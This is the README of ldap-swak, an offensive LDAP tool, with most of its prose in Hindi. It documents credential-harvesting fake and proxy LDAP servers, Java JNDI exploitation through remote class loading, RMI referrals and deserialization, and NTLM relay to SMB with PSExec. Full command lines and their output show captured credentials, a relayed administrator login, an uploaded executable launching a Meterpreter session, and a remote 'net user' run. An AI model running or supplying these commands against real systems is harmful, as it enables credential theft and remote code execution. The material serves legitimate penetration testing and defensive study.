
LDAP Swiss Army Knife
बहु-कार्यात्मक LDAP सर्वर उपयोगिता। परीक्षण उद्देश्यों के लिए शीघ्रता से LDAP सर्वर सेटअप करें, प्लेनटेक्स्ट इंटरसेप्ट करने या NTLM क्रेडेंशियल्स अग्रेषित करने के लिए MitM प्रॉक्सी, या विभिन्न Java JNDI/LDAP क्लाइंट कमजोरियों का शोषण करें।
लेखक: Moritz Bechler ([email protected]) प्रोजेक्ट रिपॉजिटरी: https://github.com/SySS-Research/ldap-swak
Maven आवश्यक है।
mvn package verify
-> target/ldap-swak-0.0.5-SNAPSHOT-all.jar
बस JAR फ़ाइल को उपयुक्त उप-कमांड और विकल्पों के साथ चलाएं:
> java -jar target/ldap-swak-0.0.5-SNAPSHOT-all.jar
[...]
LDAP Swiss Army Knife
--accept-pass=<acceptPass>
Accept login using this pass
--accept-user=<acceptUser>
Accept login using this user
--bind=<bind> Network address to bind to
--cert=<certificate> Certificate file to use (PEM, in conjunction with --key)
--fakecert-bits=<fakeCertBitsize>
RSA keySize when generating private key for fake
certificates
Default: 2048
--fakecert-cn=<fakeCertCN>
Subject DN to use when creating fake certificates
Default: cn=fake
--fakecert-lifetime=<fakeCertLifetime>
Lifetime of fake certificate in days
Default: 7
--fakecert-san=<fakeCertSANs>
Fake certificate subject alternative names
--fakecert-sigalg=<fakeCertSigalg>
Signature algorithm to use when generating fake
certificates
Default: SHA256withRSA
--fakecert-validfrom=<fakeCertValidFrom>
Fake certificate validity start
--fakecert-validto=<fakeCertValidTo>
Fake certificate validity end
--key=<privateKey> Private key file to use (PEM, in conjunction with
--cert)
--keystore=<keystore> Keystore to load key/certificate from
--keystore-pass=<keystorePass>
Default: changeit
--keystore-type=<keystoreType>
Keystore type
Default: JKS
--nostarttls Disable StartTLS
--ntlm-relay=<relayServer>
Relay intecepted NTLM exchange to SMB server for PSExec
--psexec-cmd=<psexecCMD>
Using the relayed credentials, run system command using
PSExec
--psexec-cmd-log=<psexecCMDLog>
Redirect CMD command output to file (filesystem path)
--psexec-cmd-script-loc=<psexecCMDScriptLoc>
SHARE/Path for launcher script file used for output
redirection
Default: /ADMIN$/Temp/
--psexec-cmd-script-path=<psexecCMDScriptPath>
Local filesystem for launcher script file used for
output redirection
Default: C:\Windows\Temp\
--psexec-display-name=<psexecDisplayName>
Display name of service used for PSExec
--psexec-psh-encode Encode PSExec Powershell Payload
--psexec-script=<psexecPSHScript>
Using the relayed credentials, run Powershell code
using PSExec (size limits apply)
--psexec-script-file=<psexecPSHScriptFile>
Using the relayed credentials, run Powershell code from
script file using PSExec (size limits apply)
--psexec-service-name=<psexecServiceName>
Name of service used for PSExec
--relay-read-charset=<readFileCharset>
Charset for reading remote files, only relevant when
outputting
Default: UTF-8
--relay-read-from=<readFileSource>
Using the relayed credentials, read file from this
target share/path (SHARE/path/)
--relay-read-retries=<readFileRetries>
Number of retries reading the file, possibly waiting
for the command to complete, each 1 second apart
Default: 5
--relay-read-to=<readFileTarget>
Local file to store the read file data, leave empty for
stdout
--relay-write-file=<writeFileSource>
Using the relayed credentials, write this local file to
the server
--relay-write-to=<writeFileTarget>
Using the relayed credentials, write file to this
target share/path (SHARE/path/)
--request-log Log all requests
--schemaless Don't provide any schema
--server-base-dn=<baseDN>
Base DNs to report
--ssl Run a SSL/TLS listener
--tls-cipher=<tlsCiphers>
TLS ciphers to allow
see https://docs.oracle.
com/javase/9/docs/specs/security/standard-names.html
--tls-proto=<tlsProtocols>
TLS versions to allow (TLS12, TLS11, TLS10, SSLv3,
SSLv2}
--uid-attr=<uidAttrs> Attributes to extract username from DNs
--write-creds=<writeCreds>
Write intercepted credentials to this file (format:
user pass, one per line)
-h, --help Display this help message.
-p, --port=<port> Port to bind to (defaults: 389 for normal, 636 for SSL)
-q, --quiet Only show warnings and errors
-v, --verbose Specify multiple -v options to increase verbosity.
For example, `-v -v -v` or `-vvv`
-V, --version print version information and exit
Commands:
fake Launch fake LDAP server
proxy Launch proxy LDAP server
jndi Java JNDI Exploits
SSL/TLS/StartTLS लिस्नर अन्य कोई प्रमाणपत्र प्रदान न किए जाने पर स्व-हस्ताक्षरित प्रमाणपत्र का उपयोग करते हैं। --tls-cipher और --tls-proto का उपयोग अनुमत साइफर सेट करने के लिए किया जा सकता है। हालाँकि, पुराने एल्गोरिदम का उपयोग करने के लिए Java इंस्टॉलेशन की java.security.properties फ़ाइल में समायोजन की आवश्यकता होती है। देखें https://www.java.com/en/configure_crypto.html
बस क्रेडेंशियल्स इंटरसेप्ट करें या क्लाइंट को कुछ डेटा प्रदान करें।
अतिरिक्त विकल्प:
--load= LDIF file with data to load
--schema= LDIF file containing schema definition
(if the server is not run --schemaless a basic default schema is applied)
> java -jar target/ldap-swak-0.0.5-SNAPSHOT-all.jar fake -p 1389
12:52:32.484 INFO FakeServer - Starting StartTLS listener on *:1389
> ldapsearch -H ldap://localhost:1389/ -ZZ -x -D cn=test -w test
ldap_bind: Invalid credentials (49)
=> 12:53:35.653 INFO CredentialsOperationInterceptor - Intercepted credentials cn=test:test
सभी अनुरोधों को लक्ष्य सर्वरों के एक सेट पर अग्रेषित करें। यह इंटरसेप्ट किए गए क्रेडेंशियल्स को भी रिकॉर्ड करता है।
अतिरिक्त विकल्प:
--server= Backend servers to connect to
--proxy-ssl Connect to backend servers using SSL
--proxy-starttls Connect to backend servers using StartTLS
--srv= Resolve backend server from DNS SRV record
(e.g. --srv _ldap._tcp.dc._msdcs.<AD-Domain>)
> java -jar target/ldap-swak-0.0.5-SNAPSHOT-all.jar proxy -p 2389 --server localhost:1389
12:54:19.695 INFO ProxyServer - Starting StartTLS proxy on *:2389
> ldapsearch -H ldap://localhost:2389/ -ZZ -x -D cn=foo -w test -b cn=test
ldap_bind: Invalid credentials (49)
=> 12:54:47.230 INFO CredentialsOperationInterceptor - Intercepted credentials cn=foo:test
Java JNDI LDAP क्लाइंट्स का शोषण करने के लिए कई विशिष्ट नकली सर्वर मोड।
विकल्प:
--ref-class= Class to load (ObjectFactory)
--ref-codebase= URL codebase to load class from
सभी अनुरोधों के लिए निर्दिष्ट क्लासपाथ से ObjectFactory के साथ एक JNDI reference ऑब्जेक्ट लौटाएं। जब कोई JNDI क्लाइंट lookup() सेमेंटिक्स के साथ अनुरोध करता है, तो यह क्लास लोड हो जाती है और इस प्रकार कोड निष्पादन प्राप्त होता है।
Java 11.0.1, 8u191, 7u201 और 6u211 (CVE-2018-3149) से रिमोट क्लासलोडिंग डिफ़ॉल्ट रूप से अक्षम कर दी गई है।
किसी अन्य सर्वर/प्रोटोकॉल पर रीडायरेक्ट करने वाले नियमित references को भी निम्न विकल्पों के साथ निर्दिष्ट किया जा सकता है:
--ref-address= Reference address (multiple possible)
--ref-factory= Factory class to use
विकल्प:
--referral= URI to return as referral
रेफरल का अनुसरण करने के लिए कॉन्फ़िगर किए गए JNDI क्लाइंट्स को rmi: URL का उपयोग करके RMI सेवाओं पर रीडायरेक्ट किया जा सकता है। इन सेवाओं तक पहुँच डिसीरियलाइज़ेशन हमलों को सक्षम बनाती है, गलत कॉन्फ़िगर या पुराने Java संस्करणों में RMI lookup से Reference ऑब्जेक्ट लौटाकर RCE प्राप्त किया जा सकता है। (https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/RMIRefServer.java)
विकल्प:
--serialized= File containing serialized data to return
सभी अनुरोधों के लिए एक सीरियलाइज़्ड Java ऑब्जेक्ट लौटाता है। जब कोई JNDI क्लाइंट lookup() सेमेंटिक्स के साथ अनुरोध करता है, तो प्रदान किया गया डेटा डिसीरियलाइज़ कर दिया जाएगा।
LDAP सर्वर NTLM एक्सचेंज को किसी रिमोट SMB सर्वर पर अग्रेषित करने की अनुमति देते हैं। अक्सर, यह प्रमाणित उपयोगकर्ता खाते की अनुमतियों के साथ लक्षित सर्वर की फ़ाइलों और RPC इंटरफेस तक पहुँच प्रदान करता है।
लक्ष्य सर्वर पर तीन बुनियादी क्रियाएं लागू की गई हैं:
संचालन का क्रम एक सुविधाजनक लिखें/निष्पादित करें/पढ़ें है।
उदाहरण के लिए, मीटरप्रेटर इंस्टेंस अपलोड करें और लॉन्च करें:
java -jar target/ldap-swak-0.0.5-SNAPSHOT-all.jar fake -p 1389 --ntlm-relay 192.168.56.101 --relay-write-file /tmp/test.exe --relay-write-to 'ADMIN$/Temp/foo.exe' --psexec-cmd "C:\\Windows\\Temp\\foo.exe"
10:36:53.789 INFO FakeServer - Starting StartTLS listener on *:1389
10:36:56.278 INFO PassTheHashNTLMSASLBindHandler - Have NTLM login administrator@DESKTOP-L96LL3H
10:36:56.325 INFO PassTheHashRunner - Command line %COMSPEC% /b /c start /b /min C:\Windows\Temp\foo.exe
10:36:56.333 INFO PassTheHashRunner - Service already exists
10:36:56.337 INFO PassTheHashRunner - Recreated service
10:36:56.355 INFO PassTheHashRunner - Service start timeout, expected: this is not an actual service binary
[*] Meterpreter session 4 opened (192.168.56.1:8443 -> 192.168.56.101:49696) at 2019-02-19 10:36:56 +0100
या, एक सिस्टम कमांड निष्पादित करें और उसका आउटपुट प्राप्त करें:
java -jar target/ldap-swak-0.0.5-SNAPSHOT-all.jar fake -p 1389 --ntlm-relay 192.168.56.101 --psexec-cmd "net user" --psexec-cmd-log C:\\Windows\\Temp\\test.log --relay-read-from 'ADMIN$/Temp/test.log'
10:39:09.154 INFO FakeServer - Starting StartTLS listener on *:1389
10:39:12.564 INFO PassTheHashNTLMSASLBindHandler - Have NTLM login administrator@DESKTOP-L96LL3H
10:39:12.600 INFO PassTheHashRunner - Command line %COMSPEC% /b /c start /b /min C:\Windows\Temp\launch-1550569151302.cmd
10:39:12.610 INFO PassTheHashRunner - Service already exists
10:39:12.614 INFO PassTheHashRunner - Recreated service
10:39:12.632 INFO PassTheHashRunner - Service start timeout, expected: this is not an actual service binary
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
mbechler WDAGUtilityAccount
The command completed with one or more errors.